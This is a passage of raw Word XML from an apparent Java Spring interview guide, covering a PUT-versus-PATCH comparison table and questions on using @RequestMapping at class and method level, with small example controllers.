          <v:rect id="_x0000_i2608" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="6419CF8E"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0"/>
        <w:gridCol w:w="3973"/>
        <w:gridCol w:w="4911"/>
      </w:tblGrid>
      <w:tr w:rsidR="002C6305" w:rsidRPr="002C6305" w14:paraId="5CA91389" w14:textId="77777777" w:rsidTr="00C6790E">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4D3C6FB3"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Aspect</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2295FC32"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PUT</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6EF8DFA8"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PATCH</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002C6305" w:rsidRPr="002C6305" w14:paraId="33BA9D5C" w14:textId="77777777" w:rsidTr="00C6790E">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5D5F5100"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pdate Type</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2CB34BDC"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Full update (replaces the entire resource)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="75720F1C"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artial update (only updates specified fields)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002C6305" w:rsidRPr="002C6305" w14:paraId="0B04ED98" w14:textId="77777777" w:rsidTr="00C6790E">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="19339363"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Idempotency</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6AAA02F2"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dempotent (multiple requests yield the same result)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="173FF0C8"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Not necessarily idempotent</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002C6305" w:rsidRPr="002C6305" w14:paraId="6181B96E" w14:textId="77777777" w:rsidTr="00C6790E">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="571B97E4"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ata Sent</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="589EDE18"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mplete representation of the resource</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="61BB1782"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Only the fields that need to be updated</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002C6305" w:rsidRPr="002C6305" w14:paraId="48350CB3" w14:textId="77777777" w:rsidTr="00C6790E">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="48B39DAF"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e Case</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2DB50B8E"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ed for full resource replacement or creation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="15891D48"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ed for partial updates where only some fields need modification</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002C6305" w:rsidRPr="002C6305" w14:paraId="576E0BD8" w14:textId="77777777" w:rsidTr="00C6790E">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="36351C0D"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HTTP Method</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2E81DD37"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T /resource/{id}</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="47104D30"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ATCH /resource/{id}</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="33C93C67" w14:textId="77777777" w:rsidR="00C6790E"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0987F47B">
          <v:rect id="_x0000_i2609" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A1F1A94"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Best Practices:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="264B6D78"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Use </w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>PUT</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> when the client needs to replace a resource entirely.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36B355EF"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Use </w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>PATCH</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> when only part of the resource needs to be updated.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18F4744A"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 summary, </w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>PUT</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> is for full resource replacement, while </w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>PATCH</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> is for partial updates. Both methods are important in RESTful APIs, and the choice between them depends on the scope of the update being made.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EE42082" w14:textId="49C4595B"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1C766ED">
          <v:rect id="_x0000_i2610" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B70DE0F" w14:textId="5128484F" w:rsidR="009D6DE9" w:rsidRPr="00CE4B95" w:rsidRDefault="008019C5">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="616" w:name="_Toc196308096"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Can we use @RequestMapping at class level and method level both</w:t>
      </w:r>
      <w:r w:rsidR="009D6DE9" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="616"/>
    </w:p>
    <w:p w14:paraId="25D63BBB" w14:textId="0698C0B8" w:rsidR="00C6790E" w:rsidRPr="002C6305" w:rsidRDefault="00C6790E"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Yes, you can use @RequestMapping at both the </w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>class level</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>method level</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> in Spring. The behavior is as follows:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26BE4722"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RequestMapping at Class Level:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CBBA0CA"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hen @RequestMapping is used at the class level, it is typically used to define a base URL or path for all the methods inside that class.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7514637C"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URL will be prefixed to the URLs of the methods in that controller.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A3980DD"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RequestMapping at Method Level:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B1158A7"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hen @RequestMapping is used at the method level, it defines the specific HTTP request mapping (URL, HTTP method type, etc.) for that individual method.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6382EB9D"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method-level URL is combined with the class-level URL to form the complete endpoint.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3095C412"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Example:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C8FBECD"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tController</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3197BDA1"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questMapping("/api")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25528668"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MyController {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69FB111B" w14:textId="77777777" w:rsidR="00C6790E" w:rsidRPr="002C6305" w:rsidRDefault="00C6790E" w:rsidP="002C6305">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5FCC2408"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This method handles GET requests to /api/hello</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="358F1DF9"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questMapping(value = "/hello", method = RequestMethod.GET)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E7DB5D8"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ring hello() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47B5F7E2"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Hello, World!";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AF37FD4"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5A7BC2FA" w14:textId="77777777" w:rsidR="00C6790E" w:rsidRPr="002C6305" w:rsidRDefault="00C6790E" w:rsidP="002C6305">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="58F3DE4A"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This method handles POST requests to /api/submit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EA3A52F"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questMapping(value = "/submit", method = RequestMethod.POST)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0704CFEC"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ring submitData() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EA94E06"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Data Submitted!";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20232C59"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006928F4"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D54CB37"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Explanation:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1904EE20"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class-level @RequestMapping("/api") means all method-level mappings will be relative to /api.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D300E20"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method-level @RequestMapping specifies the exact HTTP method and endpoint:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="679ACCEC" w14:textId="77777777" w:rsidR="00C6790E" w:rsidRPr="002C6305" w:rsidRDefault="00C6790E"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hello for a GET request.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38B457C5" w14:textId="77777777" w:rsidR="00C6790E" w:rsidRPr="002C6305" w:rsidRDefault="00C6790E"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ubmit for a POST request.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7997F8D4"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Combining Class-Level and Method-Level @RequestMapping:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5631DC2B"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class-level @RequestMapping("/api") serves as a base path.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51D840E6"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ach method in the controller can define its own path relative to the class-level base path.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="703EAB3E"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For example:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F3C54BF"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pi/hello maps to the hello() method.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="388BFA87"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pi/submit maps to the submitData() method.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D16F065"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Benefits of Using Both:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24114D5A"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Organization</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: You can group related methods under a common base path, making your code cleaner and more maintainable.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46D13682"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Flexibility</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: You can fine-tune individual method mappings while maintaining a common base path for all methods in a controller.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6324F7A2"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Note:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C3CFCF6"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 also supports more specialized annotations such as:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AC12D8D"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tMapping</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FFD5F4E"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ostMapping</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="063DE817"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PutMapping</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FFD690A"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DeleteMapping</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07B35E55"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se annotations are more specific and serve as shorthand for @RequestMapping with the corresponding HTTP method type.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E718BBD" w14:textId="5870A4B0"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87054C4">
          <v:rect id="_x0000_i2611" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="21D8AF95" w14:textId="0C113CA4" w:rsidR="007D2E6B" w:rsidRPr="00CE4B95" w:rsidRDefault="008019C5">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="617" w:name="_Toc196308097"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>What will happen if I use @RequestMapping at method level</w:t>
      </w:r>
      <w:r w:rsidR="007D2E6B" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="617"/>
    </w:p>
    <w:p w14:paraId="7C4E59BC" w14:textId="6C4762F5" w:rsidR="00C6790E" w:rsidRPr="002C6305" w:rsidRDefault="00C6790E"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When you use @RequestMapping at the </w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>method level</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> in Spring, it is used to specify how HTTP requests (like GET, POST, PUT, DELETE, etc.) should be mapped to a specific method. The @RequestMapping annotation defines the URL pattern, HTTP method type, and other request-specific details for that method.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64D5761C"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Key Points of Using @RequestMapping at Method Level:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C20F0E7"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RL Mapping:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46C6BADD" w14:textId="77777777" w:rsidR="00C6790E" w:rsidRPr="002C6305" w:rsidRDefault="00C6790E"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method-level @RequestMapping specifies the endpoint for that specific method, defining what URL path it should respond to.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50FB8E52" w14:textId="77777777" w:rsidR="00C6790E" w:rsidRPr="002C6305" w:rsidRDefault="00C6790E"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t can be used to define the HTTP request URL, query parameters, headers, etc.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D8FB80E"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HTTP Method Type:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D94C9E0" w14:textId="77777777" w:rsidR="00C6790E" w:rsidRPr="002C6305" w:rsidRDefault="00C6790E"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define the HTTP method type for the request using the method attribute, such as RequestMethod.GET, RequestMethod.POST, RequestMethod.PUT, etc.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00117996" w14:textId="77777777" w:rsidR="00C6790E" w:rsidRPr="002C6305" w:rsidRDefault="00C6790E"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f no HTTP method is specified, it will accept all HTTP methods by default.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39720F7D"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Response Handling:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67C8F764" w14:textId="77777777" w:rsidR="00C6790E" w:rsidRPr="002C6305" w:rsidRDefault="00C6790E"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t maps incoming requests to specific controller methods, which are responsible for processing the request and sending the response.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23C79BA9"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ustom Handling for Each Request:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BAB5E30" w14:textId="77777777" w:rsidR="00C6790E" w:rsidRPr="002C6305" w:rsidRDefault="00C6790E"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method-level @RequestMapping provides fine-grained control over the mapping of a specific HTTP request to a controller method.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38492F54"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Example of @RequestMapping at Method Level:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AA985D3"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tController</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="047FE777"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MyController {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39DF84B7" w14:textId="77777777" w:rsidR="00C6790E" w:rsidRPr="002C6305" w:rsidRDefault="00C6790E" w:rsidP="002C6305">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4EF33B11"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Handles GET request at /api/hello</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="642DEC2A"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questMapping(value = "/hello", method = RequestMethod.GET)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50CA042A"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ring sayHello() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="710E913A"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Hello, World!";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56E65355"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5D17C80E" w14:textId="77777777" w:rsidR="00C6790E" w:rsidRPr="002C6305" w:rsidRDefault="00C6790E" w:rsidP="002C6305">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7462BBAA"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Handles POST request at /api/submit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AC66F42"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questMapping(value = "/submit", method = RequestMethod.POST)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79A6EC3F"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ring submitData(@RequestBody String data) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13C232B6"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Data Submitted: " + data;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C20337B"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1A63B47A"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7E0F6809"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What Happens in the Example:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3017188F"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The </w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>sayHello()</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> method will handle GET requests to /api/hello and return a message "Hello, World!".</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0115E006"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The </w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>submitData()</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> method will handle POST requests to /api/submit, and the data from the request body will be processed and returned.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F3FF0E4"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Why Use @RequestMapping at Method Level?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="130922D7"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Mapping Specific Methods:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="608A4009" w14:textId="77777777" w:rsidR="00C6790E" w:rsidRPr="002C6305" w:rsidRDefault="00C6790E"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llows you to map different HTTP methods (GET, POST, PUT, DELETE, etc.) to different methods within the same controller class.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32C7805F"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ath Specification:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A9493F4" w14:textId="77777777" w:rsidR="00C6790E" w:rsidRPr="002C6305" w:rsidRDefault="00C6790E"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define path-specific endpoints, making the controller methods modular and easy to manage.</w:t>
      </w:r>
    </w:p>
